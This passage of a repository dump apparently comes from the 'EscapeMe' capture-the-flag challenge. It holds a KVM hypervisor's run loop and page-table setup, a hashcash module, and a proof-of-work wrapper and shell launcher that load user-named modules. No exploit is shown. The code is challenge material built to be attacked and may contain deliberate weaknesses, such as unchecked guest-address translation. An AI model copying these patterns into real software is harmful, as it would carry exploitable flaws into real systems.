kvm_guest_debug debug = { 133 | .control = KVM_GUESTDBG_ENABLE | KVM_GUESTDBG_SINGLESTEP, 134 | }; 135 | 136 | if (ioctl(vcpufd, KVM_SET_GUEST_DEBUG, &debug) < 0){ 137 | perror("KVM_SET_GUEST_DEBUG"); 138 | return -1; 139 | } 140 | 141 | if(set_long_mode(vm, vcpufd) < 0) 142 | return -1; 143 | 144 | struct kvm_regs regs = { 145 | .rip = entry, 146 | .rflags = 0x02, 147 | }; 148 | 149 | if(ioctl(vcpufd, KVM_SET_REGS, ®s) < 0){ 150 | perror("ioctl KVM_SET_REGS"); 151 | return -1; 152 | } 153 | 154 | for(;;){ 155 | struct kvm_regs regs; 156 | struct kvm_sregs sregs; 157 | uint64_t gaddr; 158 | 159 | if(ioctl(vcpufd, KVM_RUN, 0) < 0) { 160 | perror("ioctl KVM_RUN"); 161 | return -1; 162 | } 163 | 164 | #ifdef DEBUG 165 | dump_regs(vcpufd); 166 | #endif 167 | switch(run->exit_reason){ 168 | case KVM_EXIT_HLT: 169 | #ifdef DEBUG 170 | printf("HLT\n"); 171 | getchar(); 172 | break; 173 | #else 174 | return 0; 175 | #endif 176 | case KVM_EXIT_IO: 177 | #ifdef DEBUG 178 | printf("IO\n"); 179 | #endif 180 | kvm_handle_io(vm, vcpu); 181 | break; 182 | case KVM_EXIT_DEBUG: 183 | if(ioctl(vcpufd, KVM_GET_REGS, ®s) < 0){ 184 | perror("ioctl KVM_GET_REGS"); 185 | return -1; 186 | } 187 | if(ioctl(vcpufd, KVM_GET_SREGS, &sregs) < 0){ 188 | perror("ioctl KVM_GET_SREGS"); 189 | return -1; 190 | } 191 | 192 | if((gaddr = translate(vm, sregs.cr3, regs.rip, 0, 0)) == -1) 193 | return 1; 194 | 195 | if(!memcmp(guest2host(vm, gaddr), "\x0f\x01\xc1", 3) \ 196 | || !memcmp(guest2host(vm, gaddr), "\x0f\x01\xd9", 3)){ 197 | if(sregs.cs.dpl != 0) 198 | return 2; 199 | 200 | #ifdef DEBUG 201 | printf("HYPERCALL\n"); 202 | #endif 203 | kvm_handle_hypercall(vm, vcpu); 204 | *(char*)guest2host(vm, gaddr+2) = 0xd9; 205 | } 206 | else if(!memcmp(guest2host(vm, gaddr), "\x0f\x05", 2)){ 207 | if(sregs.cs.dpl != 3) 208 | return 2; 209 | 210 | #ifdef DEBUG 211 | printf("SYSCALL\n"); 212 | #endif 213 | kvm_handle_syscall(vm, vcpu); 214 | } 215 | break; 216 | default: 217 | printf("exit_reason : %d\n", run->exit_reason); 218 | #ifdef DEBUG 219 | getchar(); 220 | #endif 221 | return -1; 222 | } 223 | } 224 | 225 | return 0; 226 | } 227 | 228 | static int set_long_mode(struct vm *vm, int vcpufd){ 229 | struct kvm_sregs sregs; 230 | struct kvm_segment seg = { 231 | .base = 0, 232 | .limit = 0xffffffff, 233 | .selector = 1 << 3, 234 | .present = 1, 235 | .type = 11, // Code: execute, read, accessed 236 | .dpl = 0, 237 | .db = 0, 238 | .s = 1, // Code/data 239 | .l = 1, 240 | .g = 1, // 4KB granularity 241 | }; 242 | 243 | if(ioctl(vcpufd, KVM_GET_SREGS, &sregs) < 0){ 244 | perror("ioctl KVM_GET_SREGS"); 245 | return -1; 246 | } 247 | 248 | sregs.cs = seg; 249 | seg.type = 3; // Data: read/write, accessed 250 | seg.selector = 2 << 3; 251 | sregs.ds = sregs.ss = seg; 252 | 253 | uint64_t pml4_addr = palloc(0, 0x1000); 254 | uint64_t pdpt_addr = palloc(0, 0x1000*(((vm->mem_size-1)>>39) + 1)); 255 | uint64_t pd_addr = palloc(0, 0x1000*(((vm->mem_size-1)>>30) + 1)); 256 | 257 | assert_addr(vm, pml4_addr); 258 | assert_addr(vm, pdpt_addr); 259 | assert_addr(vm, pd_addr); 260 | 261 | uint64_t *pml4 = guest2host(vm, pml4_addr); 262 | uint64_t *pdpt = guest2host(vm, pdpt_addr); 263 | uint64_t *pd = guest2host(vm, pd_addr); 264 | 265 | for(int i = 0; i < ((vm->mem_size-1)>>39 & 0x1ff) + 1; i++){ 266 | for(int j = 0; j < ((vm->mem_size-1)>>30 & 0x1ff) + 1; j++){ 267 | for(int k = 0; k < ((vm->mem_size-1)>>21 & 0x1ff) + 1; k++){ 268 | pd[k+0x200*(j+0x200*i)] = PDE64_PRESENT | PDE64_RW | PDE64_PS | 0x200000*(k+0x200*(j+0x200*i)); 269 | } 270 | pdpt[j+0x200*i] = PDE64_PRESENT | PDE64_RW | (pd_addr+0x1000*(j+0x200*i)); 271 | } 272 | pml4[i] = PDE64_PRESENT | PDE64_RW | (pdpt_addr+0x1000*i); 273 | } 274 | 275 | sregs.cr3 = pml4_addr; 276 | sregs.cr4 = CR4_PAE; 277 | sregs.cr0 = CR0_PE | CR0_MP | CR0_ET | CR0_NE | CR0_WP | CR0_AM | CR0_PG; 278 | sregs.efer = EFER_LME | EFER_LMA; 279 | 280 | if(ioctl(vcpufd, KVM_SET_SREGS, &sregs) < 0){ 281 | perror("ioctl KVM_SET_SREGS"); 282 | return -1; 283 | } 284 | 285 | return 0; 286 | } 287 | -------------------------------------------------------------------------------- /kvm/vm/vm.h: -------------------------------------------------------------------------------- 1 | #ifndef _VM_H 2 | #define _VM_H 3 | 4 | #include 5 | #include 6 | #include 7 | 8 | #define check_addr(vm, addr) (addr < vm->mem_size) 9 | #define assert_addr(vm, addr) assert(addr < vm->mem_size) 10 | #define guest2host(vm, addr) (vm->mem + addr) 11 | 12 | struct vcpu { 13 | int fd; 14 | struct kvm_run *run; 15 | }; 16 | 17 | struct vm { 18 | int vmfd; 19 | 20 | size_t mem_size; 21 | void *mem; 22 | 23 | unsigned ncpu; 24 | struct vcpu vcpu[]; 25 | }; 26 | 27 | struct vm *init_vm(unsigned ncpu, size_t mem_size); 28 | int load_image(struct vm *vm, int fd); 29 | int run_vm(struct vm *vm, unsigned vcpuid, uint64_t entry); 30 | 31 | #endif 32 | -------------------------------------------------------------------------------- /release/hashcash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2.3 2 | """Implement Hashcash version 1 protocol in Python 3 | +-------------------------------------------------------+ 4 | | Written by David Mertz; released to the Public Domain | 5 | +-------------------------------------------------------+ 6 | 7 | Double spend database not implemented in this module, but stub 8 | for callbacks is provided in the 'check()' function 9 | 10 | The function 'check()' will validate hashcash v1 and v0 tokens, as well as 11 | 'generalized hashcash' tokens generically. Future protocol version are 12 | treated as generalized tokens (should a future version be published w/o 13 | this module being correspondingly updated). 14 | 15 | A 'generalized hashcash' is implemented in the '_mint()' function, with the 16 | public function 'mint()' providing a wrapper for actual hashcash protocol. 17 | The generalized form simply finds a suffix that creates zero bits in the 18 | hash of the string concatenating 'challenge' and 'suffix' without specifying 19 | any particular fields or delimiters in 'challenge'. E.g., you might get: 20 | 21 | >>> from hashcash import mint, _mint 22 | >>> mint('foo', bits=16) 23 | '1:16:040922:foo::+ArSrtKd:164b3' 24 | >>> _mint('foo', bits=16) 25 | '9591' 26 | >>> from sha import sha 27 | >>> sha('foo9591').hexdigest() 28 | '0000de4c9b27cec9b20e2094785c1c58eaf23948' 29 | >>> sha('1:16:040922:foo::+ArSrtKd:164b3').hexdigest() 30 | '0000a9fe0c6db2efcbcab15157735e77c0877f34' 31 | 32 | Notice that '_mint()' behaves deterministically, finding the same suffix 33 | every time it is passed the same arguments. 'mint()' incorporates a random 34 | salt in stamps (as per the hashcash v.1 protocol). 35 | """ 36 | import sys 37 | from string import ascii_letters 38 | from math import ceil, floor 39 | from sha import sha 40 | from random import choice 41 | from time import strftime, localtime, time 42 | 43 | ERR = sys.stderr # Destination for error messages 44 | DAYS = 60 * 60 * 24 # Seconds in a day 45 | tries = [0] # Count hashes performed for benchmark 46 | 47 | def mint(resource, bits=20, now=None, ext='', saltchars=8, stamp_seconds=False): 48 | """Mint a new hashcash stamp for 'resource' with 'bits' of collision 49 | 50 | 20 bits of collision is the default. 51 | 52 | 'ext' lets you add your own extensions to a minted stamp. Specify an 53 | extension as a string of form 'name1=2,3;name2;name3=var1=2,2,val' 54 | FWIW, urllib.urlencode(dct).replace('&',';') comes close to the 55 | hashcash extension format. 56 | 57 | 'saltchars' specifies the length of the salt used; this version defaults 58 | 8 chars, rather than the C version's 16 chars. This still provides about 59 | 17 million salts per resource, per timestamp, before birthday paradox 60 | collisions occur. Really paranoid users can use a larger salt though. 61 | 62 | 'stamp_seconds' lets you add the option time elements to the datestamp. 63 | If you want more than just day, you get all the way down to seconds, 64 | even though the spec also allows hours/minutes without seconds. 65 | """ 66 | ver = "1" 67 | now = now or time() 68 | if stamp_seconds: ts = strftime("%y%m%d%H%M%S", localtime(now)) 69 | else: ts = strftime("%y%m%d", localtime(now)) 70 | challenge = "%s:"*6 % (ver, bits, ts, resource, ext, _salt(saltchars)) 71 | return challenge + _mint(challenge, bits) 72 | 73 | def _salt(l): 74 | "Return a random string of length 'l'" 75 | alphabet = ascii_letters + "+/=" 76 | return ''.join([choice(alphabet) for _ in [None]*l]) 77 | 78 | def _mint(challenge, bits): 79 | """Answer a 'generalized hashcash' challenge' 80 | 81 | Hashcash requires stamps of form 'ver:bits:date:res:ext:rand:counter' 82 | This internal function accepts a generalized prefix 'challenge', 83 | and returns only a suffix that produces the requested SHA leading zeros. 84 | 85 | NOTE: Number of requested bits is rounded up to the nearest multiple of 4 86 | """ 87 | counter = 0 88 | hex_digits = int(ceil(bits/4.)) 89 | zeros = '0'*hex_digits 90 | while 1: 91 | digest = sha(challenge+hex(counter)[2:]).hexdigest() 92 | if digest[:hex_digits] == zeros: 93 | tries[0] = counter 94 | return hex(counter)[2:] 95 | counter += 1 96 | 97 | def check(stamp, resource=None, bits=None, 98 | check_expiration=None, ds_callback=None): 99 | """Check whether a stamp is valid 100 | 101 | Optionally, the stamp may be checked for a specific resource, and/or 102 | it may require a minimum bit value, and/or it may be checked for 103 | expiration, and/or it may be checked for double spending. 104 | 105 | If 'check_expiration' is specified, it should contain the number of 106 | seconds old a date field may be. Indicating days might be easier in 107 | many cases, e.g. 108 | 109 | >>> from hashcash import DAYS 110 | >>> check(stamp, check_expiration=28*DAYS) 111 | 112 | NOTE: Every valid (version 1) stamp must meet its claimed bit value 113 | NOTE: Check floor of 4-bit multiples (overly permissive in acceptance) 114 | """ 115 | if stamp.startswith('0:'): # Version 0 116 | try: 117 | date, res, suffix = stamp[2:].split(':') 118 | except ValueError: 119 | ERR.write("Malformed version 0 hashcash stamp!\n") 120 | return False 121 | if resource is not None and resource != res: 122 | return False 123 | elif check_expiration is not None: 124 | good_until = strftime("%y%m%d%H%M%S", localtime(time()-check_expiration)) 125 | if date < good_until: 126 | return False 127 | elif callable(ds_callback) and ds_callback(stamp): 128 | return False 129 | elif type(bits) is not int: 130 | return True 131 | else: 132 | hex_digits = int(floor(bits/4)) 133 | return sha(stamp).hexdigest().startswith('0'*hex_digits) 134 | elif stamp.startswith('1:'): # Version 1 135 | try: 136 | claim, date, res, ext, rand, counter = stamp[2:].split(':') 137 | except ValueError: 138 | ERR.write("Malformed version 1 hashcash stamp!\n") 139 | return False 140 | if resource is not None and resource != res: 141 | return False 142 | elif type(bits) is int and bits > int(claim): 143 | return False 144 | elif check_expiration is not None: 145 | good_until = strftime("%y%m%d%H%M%S", localtime(time()-check_expiration)) 146 | if date < good_until: 147 | return False 148 | elif callable(ds_callback) and ds_callback(stamp): 149 | return False 150 | else: 151 | hex_digits = int(floor(int(claim)/4)) 152 | return sha(stamp).hexdigest().startswith('0'*hex_digits) 153 | else: # Unknown ver or generalized hashcash 154 | ERR.write("Unknown hashcash version: Minimal authentication!\n") 155 | if type(bits) is not int: 156 | return True 157 | elif resource is not None and stamp.find(resource) < 0: 158 | return False 159 | else: 160 | hex_digits = int(floor(bits/4)) 161 | return sha(stamp).hexdigest().startswith('0'*hex_digits) 162 | 163 | def is_doublespent(stamp): 164 | """Placeholder for double spending callback function 165 | 166 | The check() function may accept a 'ds_callback' argument, e.g. 167 | check(stamp, "mertz@gnosis.cx", bits=20, ds_callback=is_doublespent) 168 | 169 | This placeholder simply reports stamps as not being double spent. 170 | """ 171 | return False 172 | 173 | if __name__=='__main__': 174 | # Import Psyco if available 175 | try: 176 | import psyco 177 | psyco.bind(_mint) 178 | except ImportError: 179 | pass 180 | import optparse 181 | out, err = sys.stdout.write, sys.stderr.write 182 | parser = optparse.OptionParser(version="%prog 0.1", 183 | usage="%prog -c|-m [-b bits] [string|STDIN]") 184 | parser.add_option('-b', '--bits', type='int', dest='bits', default=20, 185 | help="Specify required collision bits" ) 186 | parser.add_option('-m', '--mint', help="Mint a new stamp", 187 | action='store_true', dest='mint') 188 | parser.add_option('-c', '--check', help="Check a stamp for validity", 189 | action='store_true', dest='check') 190 | parser.add_option('-s', '--timer', help="Time the operation performed", 191 | action='store_true', dest='timer') 192 | parser.add_option('-n', '--raw', help="Suppress trailing newline", 193 | action='store_true', dest='raw') 194 | (options, args) = parser.parse_args() 195 | start = time() 196 | if options.mint: action = mint 197 | elif options.check: action = check 198 | else: 199 | out("Try: %s --help\n" % sys.argv[0]) 200 | sys.exit() 201 | if args: out(str(action(args[0], bits=options.bits))) 202 | else: out(str(action(sys.stdin.read(), bits=options.bits))) 203 | if not options.raw: sys.stdout.write('\n') 204 | if options.timer: 205 | timer = time()-start 206 | err("Completed in %0.4f seconds (%d hashes per second)\n" % 207 | (timer, tries[0]/timer)) 208 | 209 | -------------------------------------------------------------------------------- /release/libc-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shift-crops/EscapeMe/a71768985939c7402b7303bac07e7e7ef6adb71e/release/libc-2.27.so -------------------------------------------------------------------------------- /release/pow.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2.7 2 | # 3 | # Copyright 2018 Google LLC 4 | # 5 | # Licensed under the Apache License, Version 2.0 (the "License"); 6 | # you may not use this file except in compliance with the License. 7 | # You may obtain a copy of the License at 8 | # 9 | # http://www.apache.org/licenses/LICENSE-2.0 10 | # 11 | # Unless required by applicable law or agreed to in writing, software 12 | # distributed under the License is distributed on an "AS IS" BASIS, 13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | # See the License for the specific language governing permissions and 15 | # limitations under the License. 16 | 17 | 18 | 19 | from hashcash import check 20 | import random 21 | import string 22 | import sys 23 | import os 24 | import resource 25 | 26 | SKIP_SECRET = sys.argv[1] if len(sys.argv) > 1 else None 27 | 28 | bits = 25 29 | rand_resource = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) 30 | print 'hashcash -mb{} {}'.format(bits, rand_resource) 31 | sys.stdout.flush() 32 | 33 | stamp = sys.stdin.readline().strip() 34 | 35 | if SKIP_SECRET is None or stamp != SKIP_SECRET: 36 | if not stamp.startswith('1:'): 37 | print 'only hashcash v1 supported' 38 | exit(1) 39 | 40 | if not check(stamp, resource=rand_resource, bits=bits): 41 | print 'invalid' 42 | exit(1) 43 | 44 | print 'Any other modules? (space split) > ', 45 | sys.stdout.flush() 46 | 47 | mods = sys.stdin.readline().strip() 48 | if '/' in mods: 49 | print 'You can load modules only in this directory' 50 | exit(1) 51 | 52 | args = ['./kvm.elf', 'kernel.bin', 'memo-static.elf'] 53 | args += mods.split() 54 | print '\nexecuting : {}\n'.format(' '.join(args)) 55 | 56 | dirname = os.path.dirname(__file__) 57 | os.chdir(dirname) 58 | 59 | os.close(2) 60 | os.open('/dev/null', os.O_WRONLY) 61 | 62 | resource.setrlimit(resource.RLIMIT_NOFILE, (9, 9)) 63 | os.execv(args[0], args) 64 | -------------------------------------------------------------------------------- /release/run.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | cd `dirname $0` 4 | set -f 5 | 6 | stdbuf -i0 -o0 -e0 echo -n "Any other modules? > " 7 | read mod 8 | 9 | if [[ $mod == */* ]]; then 10 | echo "You can load modules only in this directory" 11 | else 12 | # only "-static" elf run 13 | exec ./kvm.elf kernel.bin memo-static.elf $mod 14 | fi 15 | --------------------------------------------------------------------------------